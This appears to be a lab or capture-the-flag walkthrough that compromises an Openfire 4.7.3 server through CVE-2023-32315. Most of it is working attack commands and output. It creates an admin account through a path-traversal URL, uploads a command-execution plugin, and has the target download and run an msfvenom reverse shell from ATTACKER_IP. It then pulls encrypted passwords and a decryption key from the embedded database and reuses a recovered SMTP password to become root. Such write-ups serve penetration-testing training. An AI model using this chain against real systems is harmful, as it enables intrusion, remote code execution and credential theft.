Openfire 4.7.3 can expose the administrative console on TCP 9090/9091. CVE-2023-32315 can create an admin user, and admin access can be used to upload a command-execution plugin.
Nmap may misidentify the console as Hadoop, but the jive-* strings are a useful Openfire clue:
9090/tcp open hadoop-tasktracker Apache Hadoop
|_http-title: Site doesn't have a title (text/html).
| hadoop-tasktracker-info:
|_ Logs: jive-ibtn jive-btn-gradient
9091/tcp open ssl/hadoop-tasktracker Apache Hadoop
| ssl-cert: Subject: commonName=localhost
| Subject Alternative Name: DNS:localhost, DNS:*.localhost
Browse to the admin console:
http://TARGET:9090
Openfire, Version: 4.7.3
Afrog can identify CVE-2023-32315 paths:
CVE-2023-32315-2 HIGH http://TARGET:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User
CVE-2023-32315 HIGH http://TARGET:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
Use the K3ysTr0K3R PoC to confirm the target is vulnerable and create an admin account:
wget https://raw.githubusercontent.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT/refs/heads/main/CVE-2023-32315.py
python3 CVE-2023-32315.py -u http://TARGET:9090Successful output:
[+] Target is vulnerable
[+] Successfully added, here are the credentials
[+] Username: hugme
[+] Password: HugmeNOW
After login, check users at:
http://TARGET:9090/user-summary.jsp
Observed users:
admin
b99aid
Build the Openfire CVE plugin:
git clone https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass.git
cd CVE-2023-32315-Openfire-Bypass
mvn clean packageSuccessful build artifact:
./target/org.jivesoftware.openfire.plugin.CVE-openfire-plugin-assembly.jar
Upload the plugin through the admin console. A successful upload redirects to:
http://TARGET:9090/plugin-admin.jsp?uploadsuccess=true
The shell plugin is available under:
Server -> Server Settings -> Shell Plugin
http://TARGET:9090/plugins/org.jivesoftware.openfire.plugin.cve-openfire-plugin-assembly/cmd.jsp?action=command
The observed plugin password was:
123
Use the plugin command execution to download and execute an ELF reverse shell:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=80 -f elf -o shell.elf
python3 -m http.server 8000
nc -nlvp 80Plugin commands:
wget -O /tmp/shell.elf http://ATTACKER_IP:8000/shell.elf
chmod 777 /tmp/shell.elf
/tmp/shell.elfSuccessful shell:
connect to [ATTACKER_IP] from (UNKNOWN) [TARGET] PORT
id
uid=114(openfire) gid=118(openfire) groups=118(openfire)
Useful Openfire files:
cat /etc/openfire/openfire.xml
find / -type f -name openfire.xml 2>/dev/null
find / -type f -name openfire.properties 2>/dev/nullObserved paths and config:
/etc/openfire/openfire.xml
/var/lib/openfire/embedded-db/openfire.properties
<oneTimeAccessToken>secretToken</oneTimeAccessToken>
<className>org.jivesoftware.database.EmbeddedConnectionProvider</className>
The embedded HSQLDB lives under /var/lib/openfire/embedded-db/. The encrypted OFUSER passwords and OFPROPERTY values were recovered from the database script file:
cd /var/lib/openfire/embedded-db
grep 'OFUSER' openfire.script
grep -i ofProperty openfire.scriptUseful values:
INSERT INTO OFUSER VALUES('admin',...,'a52a48e57def1a851c91e768042c5bf6078a0cac311d03fd47de71e23bdef5062cbb6f8d836d718d',...)
INSERT INTO OFPROPERTY VALUES('mail.smtp.password','OpenFireAtEveryone',0,NULL)
INSERT INTO OFPROPERTY VALUES('passwordKey','EOAJUe2Sqdlfqjk',0,NULL)
The passwordKey can decrypt OFUSER encrypted passwords with Openfire password decrypter tooling:
git clone https://github.com/z3rObyte/openfire-password-decrypter.git
python3 decrypter.py ENCRYPTEDPASSWORD EOAJUe2SqdlfqjkTry the recovered SMTP password for local privilege escalation:
su rootSuccessful root access used:
OpenFireAtEveryone
Confirm:
id
cat /root/proof.txt